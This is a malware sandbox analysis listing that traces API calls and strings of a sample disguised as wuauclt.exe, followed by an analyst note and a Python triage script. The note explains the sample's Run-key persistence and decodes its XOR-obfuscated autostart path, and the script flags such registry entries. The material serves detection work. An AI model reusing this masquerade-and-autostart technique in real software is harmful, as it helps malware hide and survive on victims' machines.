                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                            • String ID:
                                                                            • API String ID: 3782394904-0
                                                                            • Opcode ID: 1e6658f3a1c7c09b26b832841b6dc3e54d0db2190f45ee9201c8f0ac4b0f75cc
                                                                            • Instruction ID: 59a79e90b1042c7fa72c1bdd4368158aee1beb707aa836db6f4ae4b0191b2b59
                                                                            • Opcode Fuzzy Hash: 1e6658f3a1c7c09b26b832841b6dc3e54d0db2190f45ee9201c8f0ac4b0f75cc
                                                                            • Instruction Fuzzy Hash: 171160B1604340AEE715AB659D92F1337A8B74A708F14843BF200BA6F2D67D98A0D71E
                                                                            APIs
                                                                            • Sleep.KERNEL32(001B7740,00000000,00408012,?,00000000,00000000,00000000), ref: 00407F70
                                                                              • Part of subcall function 00404AF8: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                              • Part of subcall function 00404AF8: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                              • Part of subcall function 00406708: InternetGetConnectedState.WININET(?,00000000), ref: 00406717
                                                                            Strings
                                                                            • Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t, xrefs: 00407F95
                                                                            • l}+2, xrefs: 00407F7F
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00407FD9
                                                                            • wuauclt.exe, xrefs: 00407FBF
                                                                            • Microsoft, xrefs: 00407FD4
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CloseConnectedDirectoryInternetSleepStateValueWindows
                                                                            • String ID: Microsoft$Software\Microsoft\Windows\CurrentVersion\Run$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$l}+2$wuauclt.exe
                                                                            • API String ID: 3088811538-3788782062
                                                                            • Opcode ID: 2bd880a330ccf7098cd0f064fbb41e6f7692dc24caeb265b28b5c7e1db9d23fc
                                                                            • Instruction ID: 026fbd7338b316a051164a3f2916be19fdbad90e0342d7335669e4ba070194ba
                                                                            • Opcode Fuzzy Hash: 2bd880a330ccf7098cd0f064fbb41e6f7692dc24caeb265b28b5c7e1db9d23fc
                                                                            • Instruction Fuzzy Hash: 8F112170740204ABE701BAA5D913B5D77A8DB84708F61807FF540BB2D2CFBD9E04966D
                                                                            APIs
                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 004383ED
                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 00438509
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$FreeProtect
                                                                            • String ID: @O:r
                                                                            • API String ID: 2581862158-1513391029
                                                                            • Opcode ID: 62998878eee791b55a4525ffa1200409ee62ec3c0713ca06769709f58399dcba
                                                                            • Instruction ID: 1c248bd57497abf13f7211ff5bbec31fcd2e4003a81eef7960cbaa05da7696eb
                                                                            • Opcode Fuzzy Hash: 62998878eee791b55a4525ffa1200409ee62ec3c0713ca06769709f58399dcba
                                                                            • Instruction Fuzzy Hash: D25139322043169FE7258B18CC907E6F7A1EF99314F38506EF9498B781EB79AC42CB54
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,0000116C,00001000,00000004), ref: 023300A2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000003.2177669408.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_3_2330000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID: -
                                                                            • API String ID: 4275171209-2547889144
                                                                            • Opcode ID: e4a18ab6a6c0e9bdc92e7bbfef9058a5b763e4d299425c6ffac95ad41b1d133a
                                                                            • Instruction ID: e4cda7654625e7fbbb267cbdc61ad788844b4b00db57c64fd95528ee63294f29
                                                                            • Opcode Fuzzy Hash: e4a18ab6a6c0e9bdc92e7bbfef9058a5b763e4d299425c6ffac95ad41b1d133a
                                                                            • Instruction Fuzzy Hash: E12134716483015FD318CA54CC01F6BB7E9EBC8710F088A2CF9959B3C1D775A909C7A2
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(?,C0000000,?,00000000,00000002,00000080,00000000,?,00000000,?,00402FAB,00406977,00000000,00406C22), ref: 00402F4B
                                                                            • GetStdHandle.KERNEL32(000000F5,?,00000000,?,00402FAB,00406977,00000000,00406C22,?,?,?,?,00000513,00000000,00000000), ref: 00402F6B
                                                                            • GetLastError.KERNEL32(000000F5,?,00000000,?,00402FAB,00406977,00000000,00406C22,?,?,?,?,00000513,00000000,00000000), ref: 00402F7F
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorFileHandleLast
                                                                            • String ID:
                                                                            • API String ID: 1572049330-0
                                                                            • Opcode ID: 1fe4482e51c97fcd3ab156c21462874b1d18ea82579e8d9af765361da5b48797
                                                                            • Instruction ID: 8895028cb5cdc15445adb39e81ddeb6a4987250684acebc896c500d1f95e65c5
                                                                            • Opcode Fuzzy Hash: 1fe4482e51c97fcd3ab156c21462874b1d18ea82579e8d9af765361da5b48797
                                                                            • Instruction Fuzzy Hash: 4A11086120010296E7149F59CA8C71765649F84358F28C37BE8097F3E6D6FCCC85939D
                                                                            APIs
                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 00404BAB
                                                                            • RegDeleteValueA.ADVAPI32(?,00000000,00000000,00404BF0), ref: 00404BC7
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00404BF0), ref: 00404BD0
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteOpenValue
                                                                            • String ID:
                                                                            • API String ID: 849931509-0
                                                                            • Opcode ID: f6903086ebc016dd7e1dc51a1f88265785295860ed41db1915025e2c118f5eb5
                                                                            • Instruction ID: 2826a8d518f421b74224b4c9e13106b3c01b6d5214c42722886c747e2e10fd3a
                                                                            • Opcode Fuzzy Hash: f6903086ebc016dd7e1dc51a1f88265785295860ed41db1915025e2c118f5eb5
                                                                            • Instruction Fuzzy Hash: F801E1B0A04204AFDB40FFA9D84295EBBFCEF48704F5044BAB504F3691DA38DA009628
                                                                            APIs
                                                                              • Part of subcall function 00404BFC: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,?,00000000,00404C35,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C0C
                                                                            • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000,00407EA2), ref: 00404C54
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C70
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C7F
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Close$OpenQueryValue
                                                                            • String ID:
                                                                            • API String ID: 1607946009-0
                                                                            • Opcode ID: de490e853962903b2a5689227c4e63d122a59ebf74e7772f1ca70b50c0b4eacb
                                                                            • Instruction ID: 4b701f08789f1177e28b55cf3da9d2e9372874710ef882e2c23d1ca645a241ff
                                                                            • Opcode Fuzzy Hash: de490e853962903b2a5689227c4e63d122a59ebf74e7772f1ca70b50c0b4eacb
                                                                            • Instruction Fuzzy Hash: 56F049F160421866D700EB958C81FDE777C9B44354F0041ABBA45F7282D6789F408BE9
                                                                            APIs
                                                                            • RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00404AED
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00404AEB
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                            • API String ID: 2289755597-1428018034
                                                                            • Opcode ID: 5b4352bfc4d5184ded5f790e2a42e1a0fdd6f660e7ca3fdf0ef6e17b68d8ca19
                                                                            • Instruction ID: f4ecd25457bc41be08a6e23874f29c63b64927a4b92a18da8b30fdf3cb70f2a0
                                                                            • Opcode Fuzzy Hash: 5b4352bfc4d5184ded5f790e2a42e1a0fdd6f660e7ca3fdf0ef6e17b68d8ca19
                                                                            • Instruction Fuzzy Hash: 39D05EB235C30079E31D96548C43FBA73949794F10F20461EB3A66A1C0DAB07504961D
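Analyst note on the persistence routine spread over the entries above (added here; not part of the Joe Sandbox output and not the sample's own code). The two Sleep-driven functions (calls at 00407DEC and 00407F70) wait 0xDBBA0 = 900,000 ms (15 minutes) and 0x1B7740 = 1,800,000 ms (30 minutes), which is what the "Contains long sleeps" signature is reacting to. Each then reaches the subcall at 00404AF8, whose RegCreateKeyExA opens hive 0x80000002 (HKEY_LOCAL_MACHINE) at Software\Microsoft\Windows\CurrentVersion\Run with access mask 0x000F003F (KEY_ALL_ACCESS) and writes a type 1 (REG_SZ) value; the neighbouring xrefs to "Microsoft", "wuauclt.exe" and GetWindowsDirectoryA suggest a value named Microsoft pointing at a wuauclt.exe copy in the Windows directory, which is an inference from string order, not something the listing states. The long string referenced at 00407E4C and 00407F95 is obfuscated: XORing it byte-wise with the repeating schedule 4,5,6,3 yields Software\Microsoft\Windows\CurrentVersion\policies\Explorer, a second autostart location. That schedule was recovered from the ciphertext/plaintext pair and is an assumption about the sample's decoder, which is not shown in the listing. The script below decodes the string and flags Run-key values that launch wuauclt.exe; the registry data it checks is a constructed sample, and the four-character string l}+2 does not decode to anything recognizable under the same schedule, so it is left alone.

```python
import ntpath

# Values copied from the listing: the obfuscated string referenced at 00407E4C
# and 00407F95, and the plain Run-key path passed to RegCreateKeyExA at 00404AED.
OBFUSCATED = "Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t"
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

# Constructed sample of HKLM\...\Run values (value name -> REG_SZ data) as a
# triage script would read them. The "Microsoft" entry mirrors the strings the
# sample references next to RegSetValueExA; it was not taken from a real host.
SAMPLE_RUN_VALUES = {
    "SecurityHealth": r"%windir%\system32\SecurityHealthSystray.exe",
    "Microsoft": r"C:\Windows\wuauclt.exe",
}


def xor_key(i: int) -> int:
    """Assumed key schedule: 4, 5, 6, 3 repeating with the string index.
    Inferred from the ciphertext/plaintext pair; the sample's decoder is not
    in the listing, so treat this as a hypothesis that happens to fit."""
    return ((i + 1) & 3) + 3


def decode(s: str) -> str:
    """Apply the inferred per-byte XOR. XOR is an involution, so this also
    re-encodes a plaintext string."""
    return "".join(chr(ord(c) ^ xor_key(i)) for i, c in enumerate(s))


def executable_from_run_data(data: str) -> str:
    """Extract the program path from REG_SZ autostart data: either a quoted
    path or the first whitespace-separated token. Environment variables such
    as %windir% are left unexpanded."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    return data.split(None, 1)[0] if data else ""


def suspicious_run_entries(values: dict) -> list:
    """Flag autostart values that launch wuauclt.exe. The real Windows Update
    client lives in System32 and Windows does not register it under Run, so
    every match deserves review; one outside System32 is a strong indicator."""
    hits = []
    for name, data in values.items():
        exe = executable_from_run_data(data)
        if ntpath.basename(exe).lower() != "wuauclt.exe":
            continue
        in_system32 = ntpath.normcase(ntpath.dirname(exe)).endswith(r"\system32")
        reason = "wuauclt.exe autostart entry" if in_system32 else "wuauclt.exe outside System32"
        hits.append((name, exe, reason))
    return hits


def persistence_paths() -> list:
    """Both registry locations the strings point at: the plain Run key and the
    decoded policies\\Explorer key."""
    return [RUN_KEY, decode(OBFUSCATED)]


if __name__ == "__main__":
    for path in persistence_paths():
        print("autostart location:", path)
    for hit in suspicious_run_entries(SAMPLE_RUN_VALUES):
        print("suspicious:", hit)
```

On a live host the dictionary would come from enumerating HKLM and HKCU ...\CurrentVersion\Run plus ...\Policies\Explorer\Run; the path check is deliberately on the basename and directory only, so a renamed copy of the dropped file would need a hash or signature comparison instead.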
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000,004024A4,?,?,00407D29,00407D31,00000000), ref: 00403965
                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000,004024A4,?,?,00407D29,00407D31,00000000), ref: 0040399A
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ExitFreeLibraryProcess
                                                                            • String ID:
                                                                            • API String ID: 1404682716-0
                                                                            • Opcode ID: 0face7e6a07afa4f99c73d468a9f1e343faa34a2b1e5e58e08866c2428f9d067
                                                                            • Instruction ID: 1df635f73e8d6915756eab4c5c951cbada66195828d5823cced2058d235b0013
                                                                            • Opcode Fuzzy Hash: 0face7e6a07afa4f99c73d468a9f1e343faa34a2b1e5e58e08866c2428f9d067
                                                                            • Instruction Fuzzy Hash: 93214CF09002419BDB20AF6984887567ED96B44316F28857BE848B72D6D7BCCEC0CB59
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000,004024A4,?,?,00407D29,00407D31,00000000), ref: 00403965
                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000,004024A4,?,?,00407D29,00407D31,00000000), ref: 0040399A
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ExitFreeLibraryProcess
                                                                            • String ID:
                                                                            • API String ID: 1404682716-0
                                                                            • Opcode ID: 34b4af9424ecf88636d9b1d120e9cda0082e90ba4aa25ef423796a56350a7c74
                                                                            • Instruction ID: e102d307cc8d2ba104a24443bf267b0a457ef6f3725beea8bc8804b3aaa65652
                                                                            • Opcode Fuzzy Hash: 34b4af9424ecf88636d9b1d120e9cda0082e90ba4aa25ef423796a56350a7c74
                                                                            • Instruction Fuzzy Hash: 23214AF09002419EDB20AF6984887567FE86F45316F1884BBE444A62D6D7BCCAC0CA5A
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000,004024A4,?,?,00407D29,00407D31,00000000), ref: 00403965
                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000,004024A4,?,?,00407D29,00407D31,00000000), ref: 0040399A
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ExitFreeLibraryProcess
                                                                            • String ID:
                                                                            • API String ID: 1404682716-0
                                                                            • Opcode ID: 7f65ca9c6e4620e585d9556c48294706103df5a0fdade0584281f7ed769f9ece
                                                                            • Instruction ID: fd5089775d46e85b253662f2f7318a69e1a8033d09b585e59d9f2ef21dff18ec
                                                                            • Opcode Fuzzy Hash: 7f65ca9c6e4620e585d9556c48294706103df5a0fdade0584281f7ed769f9ece
                                                                            • Instruction Fuzzy Hash: A0213DF09002419ADB20AF6984887567EE86F44316F14857BE444B62D6D7BCCEC0CA5D
                                                                            APIs
                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00402B26
                                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 00402B2D
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastRead
                                                                            • String ID:
                                                                            • API String ID: 1948546556-0
                                                                            • Opcode ID: 8f9e5a5cc88b9b448b3ca2ccaa60d9936ffcce192d438f27d05647225e30c127
                                                                            • Instruction ID: a1f473cf3bc07306b130f529efb15ea380eb81567c08e13a342af83bccae4885
                                                                            • Opcode Fuzzy Hash: 8f9e5a5cc88b9b448b3ca2ccaa60d9936ffcce192d438f27d05647225e30c127
                                                                            • Instruction Fuzzy Hash: E611FE71A00109EFDB40DF69CA45A9EB7F8EF58350B108477E808EB2C0E6B4EE009765
                                                                            APIs
                                                                              • Part of subcall function 00404ACC: RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00404AED
                                                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateValue
                                                                            • String ID:
                                                                            • API String ID: 1818849710-0
                                                                            • Opcode ID: 02498e25f307462e858126ebec8e97115087d473417d076f46eb1ea06791e8cc
                                                                            • Instruction ID: da0817da91744ea337fddb203b8369e77bf46fb650e87780acf5a1fbdeaccc1d
                                                                            • Opcode Fuzzy Hash: 02498e25f307462e858126ebec8e97115087d473417d076f46eb1ea06791e8cc
                                                                            • Instruction Fuzzy Hash: B5F068B06042087FD711AFA59C92E9EBBBCEB85718F5040BEB604B32D1DA786E11855C
                                                                            APIs
                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00402B26
                                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 00402B2D
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastRead
                                                                            • String ID:
                                                                            • API String ID: 1948546556-0
                                                                            • Opcode ID: 1549d7ec87df20cd97c4e70c505dd4663c28e3963fd69a7481bb40ac7399a907
                                                                            • Instruction ID: c6e1b1fb9c3516b3f16996619766862c98deb96cc2c348e4269c8597c4437c2e
                                                                            • Opcode Fuzzy Hash: 1549d7ec87df20cd97c4e70c505dd4663c28e3963fd69a7481bb40ac7399a907
                                                                            • Instruction Fuzzy Hash: 1EF03071604118BFD704DEAADE89E6BB7ECDF54350B104477F508EB281E6B4ED009674
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00402C69,?,00000000,00000000,?,00406987,00000000,00406C22,?,?,?,?,00000513,00000000,00000000), ref: 00402590
                                                                            • SetFilePointer.KERNEL32(?,?,00000000,00000000,0040699C,00000000,00406C22,?,?,?,?,00000513,00000000,00000000), ref: 00402FC8
                                                                            Memory Dump Source
